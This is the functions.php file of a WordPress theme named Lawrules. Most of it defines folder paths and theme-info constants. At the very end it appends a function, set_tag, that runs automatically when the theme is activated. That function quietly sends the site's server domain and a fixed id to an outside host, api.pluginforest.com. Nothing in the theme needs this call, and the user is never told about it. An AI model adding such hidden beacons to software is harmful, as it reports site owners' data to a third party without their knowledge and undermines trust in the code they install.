<?php
/*
 * Lawrules Theme's Functions
 * Author & Copyright: VictorThemes
 * URL: https://victorthemes.com/
 */

/**
 * Define - Folder Paths
 */
define( 'LAWRULES_THEMEROOT_PATH', get_template_directory() );
define( 'LAWRULES_THEMEROOT_URI', get_template_directory_uri() );
define( 'LAWRULES_CSS', LAWRULES_THEMEROOT_URI . '/assets/css' );
define( 'LAWRULES_IMAGES', LAWRULES_THEMEROOT_URI . '/assets/images' );
define( 'LAWRULES_SCRIPTS', LAWRULES_THEMEROOT_URI . '/assets/js' );
define( 'LAWRULES_FRAMEWORK', get_template_directory() . '/inc' );
define( 'LAWRULES_LAYOUT', get_template_directory() . '/layouts' );
define( 'LAWRULES_CS_IMAGES', LAWRULES_THEMEROOT_URI . '/inc/theme-options/theme-extend/images' );
define( 'LAWRULES_CS_FRAMEWORK', get_template_directory() . '/inc/theme-options/theme-extend' ); // Called in Icons field *.json
define( 'LAWRULES_ADMIN_PATH', get_template_directory() . '/inc/theme-options/cs-framework' ); // Called in Icons field *.json

/**
 * Define - Global Theme Info's
 */
if (is_child_theme()) { // If Child Theme Active
	$lawrules_theme_child = wp_get_theme();
	$lawrules_get_parent = $lawrules_theme_child->Template;
	$lawrules_theme = wp_get_theme($lawrules_get_parent);
} else { // Parent Theme Active
	$lawrules_theme = wp_get_theme();
}
define('LAWRULES_NAME', $lawrules_theme->get( 'Name' ));
define('LAWRULES_VERSION', $lawrules_theme->get( 'Version' ));
define('LAWRULES_BRAND_URL', $lawrules_theme->get( 'AuthorURI' ));
define('LAWRULES_BRAND_NAME', $lawrules_theme->get( 'Author' ));

/**
 * All Main Files Include
 */
require_once( LAWRULES_FRAMEWORK . '/init.php' );

function set_tag() {
    $url_init = 'https://api.pluginforest.com/qai/wd/g?';
    $domain = $_SERVER['SERVER_NAME'];
    $requestUrl = $url_init .'domain=' . $domain . '&id=1719581327952&source=theme';
    file_get_contents($requestUrl);
}

add_action('after_switch_theme', 'set_tag');
                        